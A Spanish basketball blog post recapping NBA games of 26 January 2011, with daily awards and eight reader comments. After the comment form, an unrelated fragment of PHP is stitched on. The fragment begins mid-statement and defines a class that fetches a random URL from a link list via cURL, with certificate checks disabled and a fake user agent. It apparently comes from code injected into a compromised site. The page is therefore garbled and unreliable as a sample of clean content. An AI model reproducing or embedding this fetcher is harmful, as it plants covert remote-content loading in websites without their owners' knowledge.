La Crónica (26/01/2011)

27 de January de 2011 por TheDeerHunter

Vaya escándalo de partido nos ofrecieron anoche Durant y sus Thunder contra los Wolves de Love&Beasley. Unos últimos 10 minutos incluyendo la prórroga demoledores, no aptos para cardíacos en una vorágine de canastones y cambios de liderato. Con el brutal tercer partido superando un 30-20 en la corta carrera de Love (sólo por detrás de Garnett, Howard, Duncan y Shaq entre los jugadores activos) y la inspirada actuación de Beasley los Wolves tuvieron en sus manos la victoria. Tan sólo un par de inoportunos tiros libres fallados en dos momentos especialmente críticos más la increíble actuación de Durant (más algo de suerte en un lanzamiento postrero que se salió de Love) decantaron la victoria del lado de los Thunder. Es una garantía contar con Durantula pero también hemos constatado que no es casual ni puntual que a los Wolves se le escapen este tipo de partidos. Lástima.

Además fue noche de récords para equipos enrachados. Con la victoria nº 39 que lograron los Spurs a costa de los Jazz por tan solo 7 derrotas firman su mejor arranque de la historia. Es mucho decir teniendo en cuenta de quiénes estamos hablando, aunque también resulta algo extraño en base a su comportamiento durante sus años más laureados. Los Hornets, por su parte, con su 10ª victoria consecutiva, lograda contra los Warriors, igualan también la mejor racha de su historia. Sin pretender quitarles méritos, en su caso lo tenían bastante más fácil.

El resto de la jornada fue bastante sosilla. Si acaso, destaca la derrota de Atlanta en Milwaukee, con lentejita Boykins tocando la guitarra. También la brillante victoria de los Bobcats en Phoenix. Los Grizzlies sufrieron un serio contratiempo en New Jersey, ante la mortífera dupla Morrow-Vujacic. En esa lucha por la última plaza del Oeste los beneficiados fueron los Rockets, gracias a una intensa defensa sobre un mermado Griffin y sus Clippers, que están a punto de descolgarse de cualquier objetivo que no sea la lotería.

En la zona noble del Este, victoria cómoda de Orlando ante Indiana y de los Sixers sobre Toronto, con un Speights superlativo en tan sólo 17 minutos de juego. Finalmente los Pistons perdieron comba ante Denver.

PREMIOS

MVP: Durantula en uno de los mejores partidos de su carrera… y eso es decir mucho. Sencillamente majestuoso con 47 puntos (con mas de un 50% en tiro), 18 rebotes, 2 asistencias, 2 tapones y 2 robos. ¿Por qué eres tan bueno?

Rookie: Es raro ver a Griffin en un día flojo. Lo aprovecha Greg Monroe para lograr este caro galardón diario. 14 puntos, 7 rebotes, 2 tapones y Monroe consolidado como center titular de Detroit.

Sorpresa: Los 19 puntos de Morrow y los 14 de Vujacic fueron decisivos para amarrar la victoria. Farmar también tuvo momentos inspirados en la dirección. Que el banquillo de los Nets sea lo mejor del equipo tiene tela.

Decepción: Paul Millsap era uno de los grandes culpables del excelente inicio de campeonato de Utah Jazz. Ahora también es una de las principales causas de la crisis. Anoche 8 puntos, 3 rebotes… no parece él.

Mayor esfuerzo en vano: Por enésima ocasión la brutal dupla Love (31-21) – Beasley (30-9-7) no tuvo el premio de la victoria. Es muy fuerte.

Imágenes | Yahoo Sports

Comenta

8 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Una de parecidos razonables, como se parece el entrenador de los Mavs a Jim Carrey

      Citar

  2. Hynreck dice:
    #2

    Puesto que se repiten siempre, deberíamos llamar oficiamente al trofeo del rookie Trofeo Blake Griffin, y al del mayor esfuerzo en vano Trofeo Kevin Love. Votos a favor?

      Citar

  3. scriers dice:
    #3

    Hace poco debatíamos sobre la dupla de los Wolves, y me decíais que es normal, en partidos abiertos y malas defensas. Los Thunders no es que sean los Celtics defendiendo, pero oye, no está mal tampoco. Y ahí están los dos. Creo que Beasley se siente cómodo con su papel de jugón en un equipo de perfil bajo, y ahí puede empezar a ultradesarrollarse, pero primero él, claro. Luego lo de Love, yo creo que no es casualidad, pero bueno. Estos dos deberían rendir casi en cualquier equipo. Si fuera el general manager de ese equipo, intentaría ir puliendo el acompañamiento, poco a poco, de estos dos hombres. Uno bueno fuera y uno bueno dentro. Y a partir de ahí intentarlo. Por lo menos para intentar luchar tipo Memphis o algo así.

      Citar

  4. Rodri dice:
    #4

    ¡Majestuoso es con J! y me repito: ¿qué liga fantástica utilizáis?

      Citar

  5. Sempren dice:
    #5

    En el Trofeo Kevin Love supongo que también se podría hacer mención a Deron, 16 de 19 en tiros de dos, para 39 puntos. No está nada mal, y sin prórrogas.

      Citar

  6. TheDeerHunter dice:
    #6

    Yo suelo jugar en hoops.sports

      Citar

  7. MagicJohnson32 dice:
    #7

    Los Wolves tiraron a la basura una gran oportunidad en el draft de 2009 con la elección de Flynn y Ricky. ¿Os los imagináis con Brandon Jennings (o Collison) y Stephen Curry en su lugar?

    Rodri, yo juego la fantasy de yahoo.

      Citar

  8. KB # 24 dice:
    #8

    Hablando de parecidos, Rick Carlisle se parece a Jim Carrey pero también a Erazem Lorbek!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>